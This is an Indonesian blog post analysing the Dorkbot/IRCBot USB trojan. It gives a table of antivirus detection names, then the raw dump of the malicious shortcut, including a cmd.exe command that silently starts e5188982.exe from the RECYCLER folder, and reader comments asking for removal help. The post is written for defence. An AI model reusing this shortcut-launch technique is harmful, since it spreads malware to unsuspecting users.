Trojan Back door W32.IRCBot.NG /Win32/Dorkbot.A

Antivirus Version Last update Result
AhnLab-V3 2011.08.21.00 2011.08.21 Win-Trojan/Ruskill.96863
AntiVir 7.11.13.155 2011.08.21 TR/Agent.98304
Antiy-AVL 2.0.3.7 2011.08.21 Backdoor/Win32.Floder.gen
Avast 4.8.1351.0 2011.08.21 Win32:Trojan-gen
Avast5 5.0.677.0 2011.08.21 Win32:Trojan-gen
AVG 10.0.0.1190 2011.08.21 SHeur3.BYIR
BitDefender 7.2 2011.08.22 Trojan.Generic.KD.211916
CAT-QuickHeal 11.00 2011.08.22 TrojanDropper.Agent.gen
ClamAV 0.97.0.0 2011.08.22 Backdoor.Ruskill
Commtouch 5.3.2.6 2011.08.21 W32/Trojan2.NNUW
Comodo 9829 2011.08.22 TrojWare.Win32.Agent.~dzs
DrWeb 5.0.2.03300 2011.08.22 Trojan.Inject.37106
Emsisoft 5.1.0.10 2011.08.22 Trojan.Win32.SuspectCRC!IK
eSafe 7.0.17.0 2011.08.21 Win32.IRCBot.Ng
eTrust-Vet 36.1.8511 2011.08.19 –
F-Prot 4.6.2.117 2011.08.21 W32/Trojan2.NNUW
F-Secure 9.0.16440.0 2011.08.22 Trojan.Generic.KD.211916
Fortinet 4.2.257.0 2011.08.22 W32/Injector.FGK!tr
GData 22 2011.08.22 Trojan.Generic.KD.211916
Ikarus T3.1.1.107.0 2011.08.22 Trojan.Win32.SuspectCRC
Jiangmin 13.0.900 2011.08.21 Backdoor/Floder.bn
K7AntiVirus 9.110.5037 2011.08.20 Riskware
Kaspersky 9.0.0.837 2011.08.22 Backdoor.Win32.Ruskill.x
McAfee 5.400.0.1158 2011.08.22 Generic.dx!zsi
McAfee-GW-Edition 2010.1D 2011.08.21 Generic.dx!zsi
Microsoft 1.7604 2011.08.22 Worm:Win32/Dorkbot.I
NOD32 6398 2011.08.22 Win32/Dorkbot.A
Norman 6.07.10 2011.08.20 W32/Agent.VBDT
nProtect 2011-08-21.01 2011.08.21 Trojan/W32.Agent.96863
Panda 10.0.3.5 2011.08.21 Generic Trojan
PCTools 8.0.0.5 2011.08.22 Trojan.IRCBot
Prevx 3.0 2011.08.22 –
Rising 23.71.03.03 2011.08.18 Trojan.Win32.Generic.12877378
Sophos 4.68.0 2011.08.22 Mal/FakeAV-FS
SUPERAntiSpyware 4.40.0.1006 2011.08.20 –
Symantec 20111.2.0.82 2011.08.22 W32.IRCBot.NG
TheHacker 6.7.0.1.282 2011.08.22 Trojan/Injector.gdy
TrendMicro 9.500.0.1008 2011.08.17 TROJ_SUSPECTC.ZP
TrendMicro-HouseCall 9.500.0.1008 2011.08.22 TROJ_SUSPECTC.ZP
VBA32 3.12.16.4 2011.08.21 Trojan.MTA.01324
VIPRE 10239 2011.08.22 Trojan.Win32.Kryptik.ngw (v)
ViRobot 2011.8.22.4632 2011.08.22 –
VirusBuster 14.0.179.0 2011.08.21 Trojan.Agent!hSUcbpOvINQ

Virus ini akan membuat shortcut dan juga file didalam folder recycler , file tersebut bernama: e5188982.exe

dan isi perintah / command shortcut adalah:

L        À      Fã       `?ÆòÂ6Ë?û?`Ì ?
RÇ ð                   ç  PàOÐ ê:i?Ø +00? /C:\                   < 1     ??) WINDOWS &   ï??;Ú???)   W I N D O W S    @ 1     ?B* system32  (   ï??;Ú??B*   s y s t e m 3 2    < 2  ð P6ë?  cmd.exe &   ï?y. `? 1   c m d . e x e      P            3       O         v?n   System C:\WINDOWS\system32\cmd.exe  F / c   " s t a r t   % c d % R E C Y C L E R \ e 5 1 8 8 9 8 2 . e x e   & & % w i n d i r % \ e x p l o r e r . e x e   % c d % [ B O O T ]
 s h e l l 3 2 . d l l     ?%windir%\system32\cmd.exe   4  À0 9 8 2 3 8 3 7 8 7 5 0 0 7 ."  ü?? ??Ø??p??|?ý?|\   ì??   ????Œƒ|?H????        ?ü?|?????Z \ ???Ô??S - 1 - 5 - 2 1 - 4 2 2 4 6 8 8 0 2 3 - 2 6 1 7 0 9 8 4 ô??  	 $??|(	 ?????|??   µŸ?|?H?ì??=Ÿ?|Ø
	 YŸ?|$??% w i n d i r % \ s y s t e m 3 2 \ c m d . e x e   |õ?|h??   µŸ?|ðä H??=Ÿ?|x
	 YŸ?|   @   4  À."  ??Œ?ƒ|???Ä??       ???ª?ƒ|$   Z Š ?H?Š   Ð
    	       ?      ?Ÿ ?????   ??ØFƒ|på œöw   4  À   ???  ???Z   ,??Xƒ|?å   	        (  %   H? x??????ü?p??|`Ÿ?|ÿÿÿÿYŸ?|0öw  	     øä ?µ?*  ?µ?       ???@           â øä øä ? ?lµ?ö öw???*  Ô??lµ?
!öw???    œ??!öw   # D  R ?   Ü??            ž   \ R E G I S T R Y \ M A C H I N E \ S O F T W A R E \ C l a s s e s \ C      ?%   ?   `     ?X       server
WÜ?ÕL???dÅ?jßÚ@?ž&ß??PPTP00
WÜ?ÕL???dÅ?jßÚ@?ž&ß??PPTP00

Dari perintah diatas , sekilas kita bisa melihat alat / command yang digunakan oleh pembuat Virus….

Antara lain:

  1. System C:\WINDOWS\system32\cmd.exe  F / c   ” s t a r t   % c d % R E C Y C L E R \ e 5 1 8 8 9 8 2 . e x e   & & % w i n d i r % \ e x p l o r e r . e x e   % c d % [ B O O T ]    ini jelas si pembuat trojan / Virus menggunakan fasilitas command prompt ( cmd.exe ) untuk meng-eksekusi file virus ( e 5 1 8 8 9 8 2 . e x e ) .
  2. \ R E G I S T R Y \ M A C H I N E \ S O F T W A R E \ C l a s s e s \ C  , ini merupakan bukti ada penggunaan / pembuatan registry
  3. dll…….yang mungkin intinya….membuat file Virus bisa menguasai system komputer anda… ( maklum penulis bukan programmer ) …🙂

Kesimpulannya :

  1. Virus sekarang menggunakan fasilitas command prompt ( cmd.exe ) untuk eksekusi file Virus
  2. Untuk itu sangat disarankan mengghentikan / mendisable file cmd.exe

Untuk mendisable command prompt silakan gunakan :

  1. Plugin Registryfix ,punya anti Virus Ansav
  2. bisa gunakan tool yang ada di anti Virus smadav
  3. Atau buat script .reg yang fungsinya mematikan command prompt.

 

System C:\WINDOWS\system32\cmd.exe  F / c   " s t a r t   % c d % R E C Y C L E R \ e 5 1 8 8 9 8 2 . e x e   & & % w i n d i r % \ e x p l o r e r . e x e   % c d % [ B O O T ]
 s h e l l 3 2 . d l l     ?%windir%\system32\cmd.exe   4  À0 9 8 2 3 8 3 7 8 7 5 0 0 7 ."  ü?? ??Ø??p??|?ý?|\   ì??   ????Œƒ|?H????        ?ü?|?????Z \ ???Ô??S - 1 - 5 - 2 1 - 4 2 2 4 6 8 8 0 2 3 - 2 6 1 7 0 9 8 4 ô??  	 $??|(	 ?????|??   µŸ?|?H?ì??=Ÿ?|Ø

Tentang Mpu-Elcom

Sholatku , ibadahku , hidupku , dan matiku , ku persembahkan untuk Allah tuhan Alam semesta...
Pos ini dipublikasikan di Virus dan tag , , . Tandai permalink.

14 Balasan ke Trojan Back door W32.IRCBot.NG /Win32/Dorkbot.A

  1. rara berkata:

    Saya punya masalah terserang virus ruskill.aje…OS Windows Server 2003, aplikasi client server tidak berfungsi, apa yang harus saya lakukan?

  2. Mpu-Elcom berkata:

    scan dengan RootkitBuster_5.00.1041.zip
    setelah restart…. ketik perintah : netsh winsock reset di commanprompt bila belum bisa ada kemungkinan keinfeksi virus sality / conficker / virut silakan gunakan salitykiller / virutkiller / kidokiller….🙂

  3. asthree berkata:

    aku ada masalah …
    ada temanku yg mengirim sebuah link …
    setelah aku buka, tiba2 ada pesan di komputerku “Backdoor” ..
    Aku bingung, kira2 bagaimana solusinya ?

  4. Mpu-Elcom berkata:

    @asthree:Untuk membersihkan anda busa menggunakan..Rootkit buster untuk link yang berasal dari kiriman via email… biasanya teman anda sendiri tidak mengetahui kalau ada emsil yang berasal dari teman anda.email itu berjalan secara otomatis dari komputer yang sudah terinfeksi…

  5. ahman berkata:

    mas saya sudah menggunakan rootkit buster tapi kok di flag dan dscan menggunakan window defender msih ad virus na??
    tolong kasih tau gimana solusi na??

  6. Mpu-Elcom berkata:

    @ahman: reset bios ( lepas battery bios / clear Cmos ) pilih boot cdrom 1st …lalu gunakan mini windows xp yang ada di Hiren boot CD ( HBCD ) lalu scan dengan cleaner anti Virus.

  7. ahman berkata:

    bingung??
    ni pada laptop mas??
    gak brani bongkar??
    dah pakai beberapa program masih aja gagal malah tambah mengkhawatirkan

  8. Mpu-Elcom berkata:

    @ahman:pakai PM aja ( ym ) mpu_elcom nanti saya bantu…🙂

  9. Ronggo berkata:

    SALAM KENAL Mpu, nuwun sewu Mpu, bade tanglet komputer kulo muncul tulisan “Winlogon.exe-Aplication Error” solusine pripun niki? matur nuwun.

  10. Ayin berkata:

    minta solusi dong, kang? Kompi ane kena virus BACKDOOR \SMADOV gen!b gimana cara hapusnya.

  11. yanuar berkata:

    saya pakai anti virus ess… cara mendisable command prompt lewat ess gimana ?

  12. Mpu-Elcom berkata:

    @yanuar: kalau ingin mendisable command prompt cukup gunakan smadav / ansav… didalamnya ada tool / fasilitas untuk mendisable atau mengaktifkan command prompt.

  13. Muhammad Rickza berkata:

    bagaiman solusi untuk virus
    1. coinminer/conime.exe,
    2. Dorkbot
    3. Injector.AR
    itu membuat grafik processor saya full 100%

  14. awansgallery berkata:

    mas maw nanya…PC restart sendiri, trus di scan banyak virus malwarenya, misal trojan agent,worm dll..sadah saya scan dan delet virusnya tapi ko masih restar sendiri…
    solusinya mas supaya ga restart terus,…
    pusing ni gara gara virus yang bikin restat Pc…
    terima kasih sebelumnya…

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s